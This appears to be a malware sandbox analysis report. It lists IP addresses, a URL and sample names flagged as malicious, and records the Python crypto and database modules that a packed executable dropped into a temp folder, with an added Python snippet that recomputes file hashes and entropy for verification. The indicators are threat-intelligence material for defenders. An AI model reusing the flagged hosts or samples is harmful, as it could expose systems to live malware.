VOXEL-DOT-NETUS | nzGUqSK11D.exe | malicious | 72.26.218.72
VOXEL-DOT-NETUS | http://search.hwatchtvnow.co | malicious | 72.251.249.9
VOXEL-DOT-NETUS | http://search.hwatchtvnow.co | malicious | 216.52.2.39
NITRONETPL | HVgt9BCw5n.exe | malicious | 79.98.145.42
NITRONETPL | ZATpIQL.exe | malicious | 79.98.145.42
NITRONETPL | SecuriteInfo.com.Trojan.DownLoader34.18436.32216.exe | malicious | 79.98.145.42
                              No context
Match | Associated Sample Name / URL | Detection
C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._ARC4.pyd | HVgt9BCw5n.exe | malicious
C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._ARC4.pyd | SCJOSdfBws.exe | malicious
C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._ARC4.pyd | JwSzaivpgG.exe | malicious
C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._ARC4.pyd | WuSttkXyhP.exe | malicious
C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._ARC4.pyd | xX1VBl56Zg.exe | malicious
C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._ARC4.pyd | u60A9siB9m.exe | malicious
C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._ARC4.pyd | windows_temp_svchost.exe.exe | malicious
C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._ARC4.pyd | pzNu5nkT1f.exe | malicious
C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._AES.pyd | HVgt9BCw5n.exe | malicious
C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._AES.pyd | SCJOSdfBws.exe | malicious
C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._AES.pyd | JwSzaivpgG.exe | malicious
C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._AES.pyd | WuSttkXyhP.exe | malicious
C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._AES.pyd | xX1VBl56Zg.exe | malicious
C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._AES.pyd | u60A9siB9m.exe | malicious
C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._AES.pyd | windows_temp_svchost.exe.exe | malicious
C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._AES.pyd | pzNu5nkT1f.exe | malicious
                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):9432
                                                              Entropy (8bit):4.918232018284106
                                                              Encrypted:false
                                                              SSDEEP:192:Nxoe5FpOMxoe5Pib4GVsm5emdygkjDt4iWN3yBGHh9smidcU6CGdcU6CS9smDpOh:bfib4Glkjh4iUxs14fib41
                                                              MD5:F6775EDC5EE3B8EEDBF8310BD48C709D
                                                              SHA1:51DBC51183BFBFE57F24E9AD63840E60D2E64842
                                                              SHA-256:B5D6E4B1EF4F3E734E47F87E8226814AE7D574F4E458CCE4E21D637588F45B28
                                                              SHA-512:EDCED69415369C7EBA17D72EC1691FE44F5C5DCF7565EAE1A22112E631FFBBCE72B830BBF0D91E70484BC7F0E4D59870777B07E86126438E78E15A7337D97BD6
                                                              Malicious:false
                                                              Preview: PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):64
                                                              Entropy (8bit):0.9260988789684415
                                                              Encrypted:false
                                                              SSDEEP:3:Nlllulb/lj:NllUb/l
                                                              MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                                                              SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                                                              SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                                                              SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                                                              Malicious:false
                                                              Preview: @...e................................................@..........
                                                              C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._AES.pyd
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):29184
                                                              Entropy (8bit):7.038537453562088
                                                              Encrypted:false
                                                              SSDEEP:384:SJKckxaWHQuFS1bIYcBjZjKjzA37usOo8Vd6IHiPKDkAKB5F0riKXORPfVlLraf0:SJDkxaywpjcJhuAahoICS4AI3SAN9m
                                                              MD5:9FD78D7D6AB69AF5A14E0F29AFFD7EF4
                                                              SHA1:34D9251F746F10F656542772C067A56FE686247C
                                                              SHA-256:87C920ED2C1AFCF295729563B4DEF671DC9E36EF8B3E183D4836571300180E74
                                                              SHA-512:73768A900774CC6C96AC2A08589B42D00A2E8BAB12DC7D7FA2F6F1B27EF0399668046D3BF94997F8A3A2AF8653897F4861BCACFC03E039EBA3A7847CD4E0C005
                                                              Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: HVgt9BCw5n.exe, Detection: malicious
• Filename: SCJOSdfBws.exe, Detection: malicious
• Filename: JwSzaivpgG.exe, Detection: malicious
• Filename: WuSttkXyhP.exe, Detection: malicious
• Filename: xX1VBl56Zg.exe, Detection: malicious
• Filename: u60A9siB9m.exe, Detection: malicious
• Filename: windows_temp_svchost.exe.exe, Detection: malicious
• Filename: pzNu5nkT1f.exe, Detection: malicious
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x...<...<...<...5...=...5...>...5...;...<.......5...3...5...=...5...=...Rich<...........................PE..L...S..[...........!.........D.......8.......@......................................................................0p..D....j..P...............................8...................................Pi..@............@...............................text...*-.......................... ..`.rdata..t0...@...2...2..............@..@.data...<............d..............@....reloc...............l..............@..B........................................................................................................................................................................................................................................................................................................................................................................
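The per-file fields in the record above (size, 8-bit entropy, MD5/SHA-1/SHA-256/SHA-512, "PE32 executable (DLL)") are all recomputable from the file bytes, which is how you verify a record against a copy pulled from a host or triage the remaining drops under the same _MEI65282 directory. The following Python is an added example, not Joe Sandbox code. It runs on a constructed minimal MZ/PE header rather than on the real Crypto.Cipher._AES.pyd, so the values it prints describe that stand-in only. Reading a %TEMP%\_MEI<digits> directory as the PyInstaller onefile bootloader's extraction folder is an inference from the path; the report itself does not name the packer.

```python
"""Recompute the fields of a dropped-file record (size, 8-bit entropy,
MD5/SHA-1/SHA-256/SHA-512, PE check) and classify the drop path.

Added example, not Joe Sandbox code. It runs on a constructed stand-in for
a dropped file (a minimal MZ/PE header), so the numbers it prints are for
that stand-in, not for the report's Crypto.Cipher._AES.pyd.
"""
import hashlib
import math
import re
import struct
from collections import Counter
from typing import Dict

# PyInstaller's onefile bootloader unpacks into %TEMP%\_MEI<pid>; the
# _MEI65282 directory in the report matches that naming. This is an
# inference from the path, the report itself does not name the packer.
_MEI_DIR = re.compile(r"[\\/]_MEI\d+[\\/]", re.IGNORECASE)


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, 0.0 .. 8.0 (the report's
    "Entropy (8bit)" field). Packed or encrypted payloads sit near 8."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def is_pe(data: bytes) -> bool:
    """True if data starts with an MZ stub whose e_lfanew (offset 0x3C)
    points at the "PE\\0\\0" signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def describe(path: str, data: bytes) -> Dict[str, object]:
    """Produce the same per-file fields the report lists for each drop."""
    return {
        "path": path,
        "pyinstaller_temp_dir": bool(_MEI_DIR.search(path)),
        "size": len(data),
        "entropy": round(shannon_entropy(data), 6),
        "pe": is_pe(data),
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "sha512": hashlib.sha512(data).hexdigest().upper(),
    }


def minimal_pe() -> bytes:
    """Constructed stand-in: a DOS header with e_lfanew = 0x40 followed by
    the PE signature. Not a loadable image, just enough for is_pe()."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    return bytes(dos) + b"PE\x00\x00" + bytes(12)


if __name__ == "__main__":
    rec = describe(r"C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._AES.pyd",
                   minimal_pe())
    for key, value in rec.items():
        print(f"{key}: {value}")
```

Pointing describe() at the real dropped file reproduces the report's digests and the 7.04 entropy figure if the copy is intact; a mismatch on any hash means the file on the host is not the one the sandbox saw. The entropy is worth reading alongside the file type: a .pyd at 7.0 is high for plain compiled code, whereas the _ARC4.pyd and _DES.pyd records further down sit near 4 to 5.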
                                                              C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._ARC4.pyd
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):8704
                                                              Entropy (8bit):5.300009832250536
                                                              Encrypted:false
                                                              SSDEEP:192:zC2WXyRvqhSZJqPfKqm7Kh/3XvVlD6LaO+6:GBXeqhSZ4P5WKh/fVlaL+
                                                              MD5:8D85DBF6C981BFF4E8A1BEA86A0AC5E9
                                                              SHA1:46C4CBC697A63547F2534C0E72E3C85FB98EEF7B
                                                              SHA-256:356623219B8C098435D511C0055C061018641D8B700EB089FC6FF87D233260E1
                                                              SHA-512:6D199A2F449CB8FBCEAE63AA348722C0208B0B23C2C6E1BB17FFD8EB765CB6CA27B8C16FED276E6B7688A685D2230DA62A8DBAFE4F61A2BF96DECA2A4C46CE72
                                                              Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: HVgt9BCw5n.exe, Detection: malicious
• Filename: SCJOSdfBws.exe, Detection: malicious
• Filename: JwSzaivpgG.exe, Detection: malicious
• Filename: WuSttkXyhP.exe, Detection: malicious
• Filename: xX1VBl56Zg.exe, Detection: malicious
• Filename: u60A9siB9m.exe, Detection: malicious
• Filename: windows_temp_svchost.exe.exe, Detection: malicious
• Filename: pzNu5nkT1f.exe, Detection: malicious
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8...|i..|i..|i..u...}i..u...~i..u...{i..|i..Ji..u...si..u...}i..u...}i..Rich|i..........................PE..L...T..[...........!................E........ ...............................P......................................0'..F....!..P............................@.......................................!..@............ ...............................text...Z........................... ..`.rdata..v.... ......................@..@.data...d....0......................@....reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._DES.pyd
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):54272
                                                              Entropy (8bit):4.263764591782059
                                                              Encrypted:false
                                                              SSDEEP:384:nFwYLx5h7kir1Zsl72lpS4Jr4i5Z10OJi/fVlDDK3Wy:nFvLx5hYixZ62lvfMuMNd
                                                              MD5:4B7B86B41280DFD1E1D29A7F626393EF
                                                              SHA1:4917F788B4CD11996E1332D5F376CA0DF41370B4
                                                              SHA-256:8B0F41FD5A3D78E7C4990B1DF3414C4FA221624444F318BB0A29F92F02B1A15E
                                                              SHA-512:16CABC4BD25AD98D7B277F548A6FEED1FB05FACABE3796F19FF3A24FD1E2C04C958B4F8CDC7EB1BF3D7CEC13E5D02E170A9838EC4D617FE20F4225AC50973B7E
                                                              Malicious:false
                                                              Antivirus:
                                                               • Antivirus: Metadefender, Detection: 0%
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........8..NY..NY..NY..G!U.LY..G!D.LY..G!S.IY..NY...Y..G!C.AY..G!R.OY..G!Q.OY..RichNY..........................PE..L...T..[...........!.....*..........f4.......@......................................................................p...D...,...P...............................t...................................h...@............@...............................text...z).......*.................. ..`.rdata.......@......................@..@.data...............................@....reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._DES3.pyd
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):54784
                                                              Entropy (8bit):4.252216429200493
                                                              Encrypted:false
                                                              SSDEEP:384:nOwYe6V2dqG5islrOmlpipK4r4t5Z10OJi/fVlSUpH3d:nOve6V2MG5iKOmleKpMuMNX
                                                              MD5:F6D78AB78381BF4056335A75EE7C8523
                                                              SHA1:BCF4557C58CC41D72B2E3ABDF3F44AEEB80A2871
                                                              SHA-256:5317F80AE3B32D6A3D4CE013BDF93F5D857E6625BC89C778171983E95865ABE4
                                                              SHA-512:54089EEF475B446EE12FAB1D9E75B0FC1282392F38CE3A5DA8C2B29EBD8D4C748033D1F9CA4D7A2254FA7CC464422E12DB4AF48D43F50F7F108DDB57A7F87D8A
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........8..NY..NY..NY..G!U.LY..G!D.LY..G!S.IY..NY...Y..G!C.AY..G!R.OY..G!Q.OY..RichNY..........................PE..L...T..[...........!.....,...........4.......@......................................................................p...F...,...P...............................t...................................h...@............@...............................text....*.......,.................. ..`.rdata.......@.......0..............@..@.data...............................@....reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Hash._MD4.pyd
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):10752
                                                              Entropy (8bit):5.8334998183174545
                                                              Encrypted:false
                                                              SSDEEP:192:dkX62X5mDAtxvcBjXP7htQTaleMrSai3XvVlD6RzL:dkXDntCjf7ITabrQfVlGzL
                                                              MD5:F98765AF6763CFE9ECE7136F14F88397
                                                              SHA1:D826BEE700297B1BE49C0A682709E87749BD5E38
                                                              SHA-256:D722ED0EE7FEF1F30860F83B3FECFA089955CA0D6B522A379EFDC34F0401E321
                                                              SHA-512:91E05639AF5341405DE909867981C345E57F4D1A6E51C5DBE9E31C70570D4BC695B0C3E4E4C241BBB7891FA9127CE5E9B0F8E1A643C2C3E056880BC1B6F582DD
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z...>i..>i..>i..7...?i..7...<i..7...9i..>i...i..7...1i..7...?i..7...?i..Rich>i..........PE..L...R..[...........!.........................0...............................`.......................................6..D....1..P............................P.......................................0..@............0...............................text............................... ..`.rdata.......0......................@..@.data...L....@......."..............@....reloc.......P.......&..............@..B........................................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Hash._SHA256.pyd
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):10240
                                                              Entropy (8bit):5.881378398394844
                                                              Encrypted:false
                                                              SSDEEP:192:uidzghojQKuGhNUyAHzoOTGd66PXFDcLmo+tRcv3XvVlD6Uea:tdzgwLkRz9TG9XA+tYfVlL
                                                              MD5:977AA3580A3D9CD373407967086C88B8
                                                              SHA1:961272025A7A33C8FE52A24B3EC502E3AF17F69C
                                                              SHA-256:5C651F53138499B2DD436E1A432DAC3F0EED4BA1426685A0F4EDCFED05349C90
                                                              SHA-512:B14531773030842D1CAEB223C1DDF885DE82FF6AA50C6D28CB3652CEACFF3C191E70B0079C45957F2FDF244E2E0298BA7DCA0C88B6556B6522E54811A0D01404
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y...=i..=i..=i..4...<i..4...?i..4...:i..=i...i..4...2i..4...<i..4...<i..Rich=i..........PE..L...R..[...........!.........................0...............................`.......................................7..J....2..P............................P.......................................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data........@....... ..............@....reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Random.OSRNG.winrandom.pyd
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):9728
                                                              Entropy (8bit):5.5542267769565115
                                                              Encrypted:false
                                                              SSDEEP:192:4SI4ySF5IHS37udhLgK83XcgVlD6ReFI4BUKXKXecWnHcyZfgC:44F5cQ7SaK0MgVlRZZ
                                                              MD5:731A6B82B8475E383DAC97B20AEAB7F7
                                                              SHA1:460A76A770ADA359072FE9D0D46A688D2824C5AE
                                                              SHA-256:D710B5A398DD0DC128129F3B035D459D6860B5C45CCC8EE2066069202B9D1F30
                                                              SHA-512:648119C453D0B8B81025C96003DC36A1DA6216C471BD7692260A13FBB70306899DA327CE2B38517214A1D66EF0E63707E77AAD4377529250EFF9DCBC624F16B8
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........#.x.p.x.p.x.p..]p.x.p..Lp.x.p..[p.x.p.x.p.x.p..Kp.x.p..Zp.x.p..Yp.x.pRich.x.p........................PE..L...Q..[...........!......................... ...............................P.......................................'..N....!..d............................@.......................................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...L....0......................@....reloc..F....@......."..............@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Util._counter.pyd
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):10240
                                                              Entropy (8bit):5.238797469870645
                                                              Encrypted:false
                                                              SSDEEP:192:KiDn3nSJIcNaVT+Gbp8wyrKg3XvVlD6o3:KMn3nkNAT+Gl8XKgfVlN
                                                              MD5:556BD0C831364879E75E873DA82DCCF8
                                                              SHA1:71F6EB2C1738FDD5EB001A0009FE45F42A8A16BB
                                                              SHA-256:A3C7473617025DE594F45EA4EB0B943F6E406935017D746DE2C310698E3C689D
                                                              SHA-512:5FE2FF278F88F18893736806DDC28E02CA998F835EB1739E6F17DDFB8716C9DC351175E1164C0D4B9A6B68795458EA779EBAA9F54D69461111CE69C1EBC74AE8
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@i..@i..@i..I...Ai..I...Bi..I...Gi..@i..ri..I...Oi..I...Ai..I...Ai..Rich@i..................PE..L...T..[...........!................7........0...............................`.......................................6..L....1..P............................P.......................................0..@............0...............................text...J........................... ..`.rdata.......0......................@..@.data........@......................@....reloc.. ....P.......$..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Util.strxor.pyd
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):7680
                                                              Entropy (8bit):5.503452043125256
                                                              Encrypted:false
                                                              SSDEEP:96:Sl6zocBaUTNs8MODmfSzAEJzaXtFT7KZr3XA+pVAAD6rOWPQsm8bt:S4bBxN6uooJaXtFT7Kl3XfVlD6yWPxZ
                                                              MD5:32DCE0579BD19FF24BD4A1ACCF5AFC73
                                                              SHA1:30ED1B74D91606F56D15636E4D0773EDC575F011
                                                              SHA-256:2170B576F5F22D06E700E5570DC234FA5F77C7FE4AF8394F0DAC49566F9A8B40
                                                              SHA-512:A0A43A3F50BA4AB33F5DC96F51ED3D086913952A3F7CB1DB181D94685A014DC2052E933FD32E46F26C08099A9586E6A4B423169324CE3DE7F42AFF1052D05B1A
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x...<i.<i.<i.5.A.=i.5.P.>i.5.G.;i.<i..i.5.W.3i.5.F.=i.5.E.=i.Rich<i.........................PE..L...T..[...........!......................... ...............................P.......................................%..H....!..P............................@....................................... ..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\_MEI65282\Include\pyconfig.h
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:C source, ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):21451
                                                              Entropy (8bit):5.366806363890556
                                                              Encrypted:false
                                                              SSDEEP:384:rGbGMpOukkcMSYuw8BsHhpuDaAQMiBaZGVsdgh3nfog:rGbGMpYvTSbaa+IaZ01fog
                                                              MD5:557582E29F77226734BF9E750785BD96
                                                              SHA1:E10E97F04294630BD9F7D6C9F4F93F6188A80DC9
                                                              SHA-256:24822847BBA1EE7AF1A0F02B95D36D6515C5AC37ECB180A89D9D7628FC7675FD
                                                              SHA-512:5DF0614C905091497E1404F73D60A69434B47DCE101F80CC02BE115CE9EB64D28CD3974B0F031E38D902C6BF64D877DC6C8FAABBC60F033A8A4D991CECC63A0F
                                                              Malicious:false
                                                              Preview: #ifndef Py_CONFIG_H..#define Py_CONFIG_H..../* pyconfig.h. NOT Generated automatically by configure.....This is a manually maintained version used for the Watcom,..Borland and Microsoft Visual C++ compilers. It is a..standard part of the Python distribution.....WINDOWS DEFINES:..The code specific to Windows should be wrapped around one of..the following #defines....MS_WIN64 - Code specific to the MS Win64 API..MS_WIN32 - Code specific to the MS Win32 (and Win64) API (obsolete, this covers all supported APIs)..MS_WINDOWS - Code specific to Windows, but all versions...MS_WINCE - Code specific to Windows CE..Py_ENABLE_SHARED - Code if the Python core is built as a DLL.....Also note that neither "_M_IX86" or "_MSC_VER" should be used for..any purpose other than "Windows Intel x86 specific" and "Microsoft..compiler specific". Therefore, these should be very rare.......NOTE: The following symbols are deprecated:..NT, USE_DL_EXPORT, USE_DL_IMPORT, DL_EXPORT, DL_IMPORT..MS_CORE_DLL.....WIN3
                                                              C:\Users\user\AppData\Local\Temp\_MEI65282\Microsoft.VC90.CRT.manifest
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1050
                                                              Entropy (8bit):5.382436822526041
                                                              Encrypted:false
                                                              SSDEEP:24:2dtn3mGv+zg4NnEN4XKHVJrMmV6LSWV5rcb3S:ch35+zg4i0KHVVdOmS
                                                              MD5:BFB93876892CCA8E2AD0021585C34C8B
                                                              SHA1:0DDE1B225C98825A09D8FF85F462571C9C862E35
                                                              SHA-256:0D060ED7C25159B7B75F16D449963BFD639C15B3C5280BC7897403268C2B9F35
                                                              SHA-512:FE70540B3B3FA88B32DFB2FF7406A3A9819E7862B850D871B932996BBEFFDBC70D7192D6E3196A8583B2DB756CA9CC278505AFBE585BA30EB1222D4F8BE15B7B
                                                              Malicious:false
                                                              Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">.. <noInheritable/>.. <assemblyIdentity name="Microsoft.VC90.CRT" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b" type="win32" version="9.0.30729.6161"/>.. <file hash="7021457b391b35606e708c69987e4b6f606609ee" hashalg="SHA1" name="msvcr90.dll"/>.. <file hash="88549dd3ce8eaa62ca8aad0e96ddd9fec2203628" hashalg="SHA1" name="msvcp90.dll"/>.. <file hash="65ef374affa5b48827e539b35b3275c201b41fc9" hashalg="SHA1" name="msvcm90.dll"/>.. <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">.. <application>.. <supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>.. <supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>.. <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>.. <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>.. <supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>..
                                                              C:\Users\user\AppData\Local\Temp\_MEI65282\_ctypes.pyd
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):73216
                                                              Entropy (8bit):6.461657731843018
                                                              Encrypted:false
                                                              SSDEEP:1536:mPooRc/ALSbPUxbd8OntpP7L4TRqLsxprpsVNap5Ok9R/Ecyp7eBxJKm9yyk:HoS/VGdJnt577LiprpsOx/PK7eBxJKv
                                                              MD5:98638A1BFDECDCECF4D7D47B521AC903
                                                              SHA1:320DD42EE55CFD4016922D5927E1CA4967191315
                                                              SHA-256:11C739D28227773D70C3941D2E979B9D4CEE12F1D53CC94DAF77B62A4D3A0327
                                                              SHA-512:D1B8EEF337219F35769D7061BD760A066522FBB34BDE6F1D130897F6522AADA2B9BFB15F49559A48534D6C656EF3EDCD8689D7D76D72C5F022DB3906306022D7
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t..............G-......G;......G<......G+......m;......m+.........B....G1......G*......G).....Rich............PE..L...X20L...........!.........v...............................................P..................................................x............................0..X...p...................................@...............\............................text............................... ..`.rdata...=.......>..................@..@.data...h"....... ..................@....reloc..:....0......................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\_MEI65282\_hashlib.pyd
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):287232
                                                              Entropy (8bit):6.762391113453008
                                                              Encrypted:false
                                                              SSDEEP:6144:oAIIIII1OiZOSDAn502DSe+2pvonjVyflFCRl4VOgj1e5:ofOiZOSkfQpcr
                                                              MD5:22071845DAF8C1F6E87F006673EED4FD
                                                              SHA1:B3BC158D041AECC313900CF9A7205E13C47DD9A3
                                                              SHA-256:51C47389782BC2DE8E401D231233E2E7F1A4B3AFCE7DF4DDF4AD533184DAD407
                                                              SHA-512:6A11C1620E60B35D321C340687E03A5D9C9EB07912D95C7BA8B9D25867F246B6F46E23D5EE5EC6999C38A92460E85EFD8704100E81492C26E38BA3DA0F0E5972
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T8.p.Y.#.Y.#.Y.#...#.Y.#...#.Y.#...#.Y.#.!.#.Y.#.Y.#eY.#.Y.#.Y.#...#.Y.#...#.Y.#...#.Y.#...#.Y.#Rich.Y.#........................PE..L...}20L...........!................z...................................................................................L......x............................P...;...................................................................................text............................... ..`.rdata..,...........................@..@.data...............................@....reloc...F...P...H..................@..B................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\_MEI65282\_mssql.pyd
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):497152
                                                              Entropy (8bit):6.710342222175021
                                                              Encrypted:false
                                                              SSDEEP:12288:TdG0s3nONXNCMMIyrlK0WDev0Q5e5G053s6CCdFX:TdMITZe0Qud53Zvj
                                                              MD5:E0AA19EC9424664A61A8413CDF346A67
                                                              SHA1:DD82A340C56A9E1BA895E081ADC560A77565C8B5
                                                              SHA-256:D5253B4C05F1F82B066F4D59294DC3F531A74161161A1857D6BBB44D61639608
                                                              SHA-512:B039445276E9370200F1A03F58521B82AC794C5E24772C0DD2E27A08AD80CE179EEB1CA927E530F489354C695C3DD6C2A5301623ABFBC9E13AEF38B4B9009E06
                                                              Malicious:false
